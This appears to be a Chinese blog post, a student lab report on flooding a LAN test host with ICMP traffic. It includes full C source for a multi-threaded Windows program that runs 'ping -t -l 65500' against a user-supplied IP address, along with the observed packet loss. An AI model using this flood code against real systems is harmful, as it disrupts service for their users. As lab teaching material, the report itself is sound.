软件安全实验——局域网DDoS攻击

最新推荐文章于 2023-06-19 22:34:44 发布
最新推荐文章于 2023-06-19 22:34:44 发布
阅读量6.3k 收藏 64
点赞数 3
分类专栏: 软件安全 文章标签: ping ICMP DoS DDos 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wzz_2363173126/article/details/119975205
版权

文章目录

实验任务

    对局域网内IP地址为10.12.186.186的主机(已关闭防火墙)发起基于网络流量DDoS攻击。

实验过程

DoS攻击与DDoS攻击

    DoS是Denial of Service的简称,即拒绝服务。造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DOS攻击有计算机网络宽带攻击和连通性攻击。DoS攻击的目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃
    分布式拒绝服务攻击(DDoS)可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用。DDoS攻击的思路是与目标主机建立大量的网络连接,发送大量的网络请求,大量占用其网络资源,使其网络无法提供正常的服务。

ping命令参数

    在Windows下使用命令ping /?查看ping命令参数的含义:
    通过该提示可以看出:我们可以使用ping命令的-n参数指定要发送的回显次数(或者使用-t参数使其一直发送),可以使用-l指定发送的缓冲区大小,可以使用-w指定等待每次回复的时间。
请添加图片描述

实施DDoS攻击

    DoS攻击程序需要与目标主机建立大量的网络连接,发送大量的网络请求,大量占用其网络资源,使目标主机网络无法提供正常的服务。
    而ping命令可以使用ping命令的- t参数使其一直对目标主机发送网络请求,可以使用-l 65500指定较大的发送缓冲区大小
    程序需要控制输入一个有效的IP地址,然后利用字符串拼接操作拼接出“ping +IP地址”的命令,通过调用system函数使用ping命令实现攻击
    为了使得单机的攻击最大化,需要使用线程编程技术中的CreateThread函数创建多个线程进行攻击。此外,还需要多开攻击进程(使攻击进程占所有进程的比例增加,使得攻击进程尽量占用更多的时间片),使其尽量消耗CPU资源,使攻击效果最大化。
    DDoS攻击程序源代码如下:

#include <stdio.h>
#include <windows.h>

#define MaxSize 50
#define MaxThreadNum 128

HANDLE ThreadHandle[MaxThreadNum]; //线程句柄
DWORD ThreadID[MaxThreadNum];      //线程ID

DWORD WINAPI DDosServer(LPVOID IP_Address)
{
    //初始化ping命令
    char Command[MaxSize] = "ping \0";

    //IP格式转化
    char *IP = (char *)IP_Address;

    //拼接IP
    strcat(Command, IP);
    //拼接ping命令参数(方式、缓冲区大小、请求数)
    //同时保证可控
    strcat(Command, " -t -l 65500\0");
    //执行ping命令
    //这个命令不会结束,程序无法正常终止
    system(Command);

    return 0;
}

int main()
{
    int ThreadNum = 8;
    char IP[16] = {0};

    //输入目标主机IP
    printf("请输入目标主机IP: ");
    scanf("%s", IP);

    printf("请输入攻击线程数:");
    scanf("%d", &ThreadNum);

    for (int i = 0; i < ThreadNum; ++i)
    {
        ThreadHandle[i] = CreateThread(NULL, 0, DDosServer, &IP, 0, &ThreadID[i]);
        if (ThreadHandle != NULL)
            printf("攻击线程%d创建成功!\n", i);
        else
            printf("攻击线程%d创建失败!\n", i);
    }

    //等待全部线程结束
    WaitForMultipleObjects(ThreadNum, ThreadHandle, TRUE, INFINITE);

    for (int i = 0; i < ThreadNum; ++i)
    {
        //关闭线程句柄
        //TerminateThread(ThreadHandle[i], 0);
        if (CloseHandle(ThreadHandle[i]) == true)
            printf("攻击线程%d结束成功!\n", i);
    }

    return 0;
}

    启动攻击程序,输入IP地址10.12.186.186,开始DDoS攻击。
    在刚刚发动DDOS攻击时,攻击方能正常收到目标机器的回复报文
DDoS
    在多台机器上使用多个进程和多个线程进行DDoS攻击时,观察到部分回复报文丢失
DDoS
    此时,在目标主机上观察到:DDoS攻击虽然未能使目标主机瘫痪,但是大量占用了目标主机的网络资源,可能使其网络无法提供正常的服务,DDoS攻击成功有效。
DDoS

Dennis F
关注
  • 3
    点赞
  • 64
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
局域网面对攻击的安全策略.doc
05-09
局域网面对攻击的安全策略.doc
网络安全】免费DDOS攻击测试工具
Javachichi的博客
01-16 7163
DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃。然而随着网络上免费的可用DDOS工具增多,Dos攻击也日益增长,下面介绍几款Hacker常用的Dos攻击工具。‍‍LOTC是一个最受欢迎的DOS攻击工具。这个工具被去年流行的黑客集团匿名者用于对许多大公司的网络攻击。
DDoS攻击实验笔记
weixin_52034407的博客
04-07 2939
DDoS攻击实验笔记
通信与网络中的DDos攻击实验平台的设计与实现
10-20
摘 要:针对DDos攻击实验难以开展的问题,设计了基于虚拟机技术的DDos攻击实验平台。分析了DDos攻击实验平台的组成结构、各组成模块功能以及平台的工作过程。重点对DDos攻击数据产生方法和可视化的攻击过程进行了研究,利用Visual C#和WinPcap开发驱动实现攻击数据产生,利用心跳监测实现攻击过程监测。实践证明:该平台能够确保在任意的攻击状态下都能够实时地采集和监测到攻击过程的数据,从而为用户分析DDos攻击过程和攻击效果提供强有力的支持。   0 引言   DDos 是一种非常常见的网络攻击手段,为了能够更好地研究和分析DDos 攻击的过程,动态地掌握DDos 攻击过程不同阶段
高级用户必备工具-——局域网扫描器
08-04
网管、高级用户,想知道办公室有哪些电脑,哪些MAC地址,哪些资源有风险,用这个扫描器,简单快速完成任务。
DDOS攻击实验
qq_45655136的博客
08-05 3906
DDos攻击 1.拒绝服务攻击Dos 2.带宽攻击:以极大的通信量冲击网络 3.连通性攻击:以大量的连接请求冲击计算机 4.直接攻击 ping of death syn flood:防御(缩短SYN timeout时间,设置SYN cookie) tcp连接请求洪水攻击 UDP风暴攻击 5.分布式拒绝服务攻击DDOS 6.肉鸡:常指被黑客控制的机器 7.拖库,洗库,撞库 8.netstat命令用于显示与IP,TCP,UDP和ICMP协议相关的统计数据,一般用于检测本机各端口的网络连接情况 9.泪滴攻击
DDOS攻击简易介绍
Fly_鹏程万里
04-12 5540
DOSDDOS攻击DOS攻击(Denial of  Service 拒绝服务攻击):凡是利用网络安全防护措施不足导致用户不能继续使用正常服务的攻击手段,都可以被称为是拒绝服务攻击,其目的是通过消耗网络宽带或系统资源,使网络或计算机不能提供正常的服务。DDOS(Distributed Denial of Service ,分布式拒绝服务),凡是攻击者通过控制在网络上的傀儡主机,同时发动他们向目标主...
黑客入门-必学的8个DOS命令
m0_74942241的博客
03-11 1726
作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。这对我们**是很有利的,最重要的,它为我们克隆帐户提供了前提。这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。
DosDDOS介绍及实例
whoim_i的博客
11-07 3368
目录一、拒绝服务攻击(Dos)1、拒绝服务攻击的分类1.滥用合理的服务请求2.制造大量无用数据3.利用传输协议缺陷4.利用服务程序的漏洞2、拒绝服务攻击的原理3、常见拒绝服务攻击行为特征与防御方法1.死亡之 PingPing of death)攻击2. SYN 洪水(SYN Flood)3.Land 攻击4.Smurf 攻击5.UDP 洪水(UDP Flood)6.IP 源地址欺骗 DOS 攻击...
什么是DOS攻击,如何防护?
最新发布
m0_49521873的博客
06-19 1998
DOS攻击(Denial of Service攻击)是指攻击者通过发送大量的流量请求或恶意数据包,使服务器无法正常运行,带宽和网络资源耗尽,从而使合法用户无法访问服务器。5. 限制连接请求:对于停留在某个IP地址上的用户,限制连接请求的数量,从而减少服务器的压力。总之,防范DOS攻击的最佳方法是在保持高度警惕的同时使用多种方法,以确保服务器的稳定运行。4. 使用攻击检测工具:安装防御软件,检测可能的DOS攻击,并采取相应的措施应对。6. 启用网络流量监控:定期监控服务器上的网络流量,及时发现异常情况。
局域网组成实践——局域网的规划与设计.pptx
07-04
计算机班 局域网组成实践 项目2 局域网的规划与设计 局域网组成实践——局域网的规划与设计全文共54页,当前为第1页。 04. 03. 02. 01. 局域网的规划 网络硬件设备和互联介质 局域网的布线和施工 如何组网 目录 局域网组成实践——局域网的规划与设计全文共54页,当前为第2页。 局域网的规划 01. 局域网组成实践——局域网的规划与设计全文共54页,当前为第3页。 01 需求分析 5 选择设备 4 可行性 研究与计划 2 方案设计 7 局域网的规划 编写技术文档 3 投资预算 4 局域网组成实践——局域网的规划与设计全文共54页,当前为第4页。 网络的物理布局(位置、距离、环境等) 用户设备的类型和配置(旧物利用) 通信类型及通信负荷(数据、音频、视频、多媒体信号流量) 网络应提供的服务(资源共享、办公自动化、远程控制、电子邮件) 网络的安全性(不同的安全要求选择不同的网络类型、防火墙等) 01 局域网的规划 需求分析 5 局域网组成实践——局域网的规划与设计全文共54页,当前为第5页。 技术可行性 经费可行性 可行性 研究与计划 2 01 局域网的规划 传输通道、用户接口
利用局域网构建安全的信息化高校实验
04-18
探讨了如何利用局域网技术开发信息资源,促进信息交流和知识共享,提高资源设备利用率和教学科研效率,改变实验室内部信息孤岛的状况,构建一个安全的信息化实验室。具体讨论了局域网的树形拓扑结构设计、网络和信息安全设计、IP地址规划以及部署在其上的服务和功能。该局域网方案实现了实验室内的软硬件资源的共享、点对点通讯、仪器设备远程化操作、分布式实验数据库系统、分布式存储和计算、团队协作式开发、信息化管理、Web服务、Email和传真服务等一系列功能,提高了实验室信息化水平,取得了良好的应用效果。
实验报告局域网组建.doc
03-23
实验报告局域网组建
DDoS攻击--防护本质
02-24
DDoS全称DistributedDenialofService,中文意思为“分布式拒绝服务”,俗称洪水攻击,就是利用大量合法的分布式服务器对目标发送请求,从而导致正常合法用户无法获得服务。服务:系统提供的,用户在对其使用中会受益的功能拒绝服务:任何对服务的干涉如果使其可用性降低或者失去可用性均称为拒绝服务拒绝服务攻击:是指攻击者通过某种手段,有意地造成计算机或网络不能正常运转从而不能向合法用户提供所需要的服务或者使得服务质量降低分布式拒绝服务攻击:处于不同位置的多个攻击者同时向一个或者数个目标发起攻击,或者一个或多个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击,由于攻
大飞哥飞鸽传书——局域网内部通讯软件.rar
07-04
飞鸽传书是面向企业、学校、家庭的局域网即时通讯软件,实现局域网内部消息/文件的高速传输、多媒体远程播放和飞鸽网络打印,软件具有即装即用、传输快捷的特点,深受广大用户的喜爱。目前已经覆盖Windows / Mac / ...
计算机网络课程设计——局域网设计.doc
06-28
计算机网络课程设计——局域网设计
局域网VLAN组建(实验二).zip_局域网_网络安全_网络安全实验
09-24
组建网络的安全要点,操作步骤,实验实例,注意事项
课程设计——局域网聊天程序设计.pdf
11-28
课程设计——局域网聊天程序设计.pdf
安卓Android源码——局域网视频聊天.zip
10-14
安卓Android源码——局域网视频聊天.zip
预防局域网攻击安全知识
04-29
以下是一些预防局域网攻击的安全知识: 1. 安装防火墙:防火墙是保护网络免受攻击的第一道防线,使用防火墙可以控制网络中流入和流出的数据流量,以及阻止未经授权的访问。 2. 更新和维护设备:及时更新和维护设备的操作系统、应用程序和安全补丁,可以修复已知的漏洞和问题,从而减少网络遭受攻击的风险。 3. 加密网络通信:使用加密协议,如SSL/TLS,可以保护网络通信中的敏感信息,防止被黑客窃取或篡改。 4. 实施访问控制:通过实施访问控制,可以限制对局域网中的资源和数据的访问权限,只允许授权用户或设备访问。 5. 监控网络流量:实时监测网络流量可以及早发现异常流量和可疑行为,从而采取相应的措施,保护网络安全。 6. 建立安全策略:建立和实施完善的安全策略,包括密码策略、访问控制策略和数据备份策略等,可以帮助组织更好地管理网络安全风险。 总之,保护局域网安全需要一系列综合措施,包括技术措施、管理措施和人员培训等方面的工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值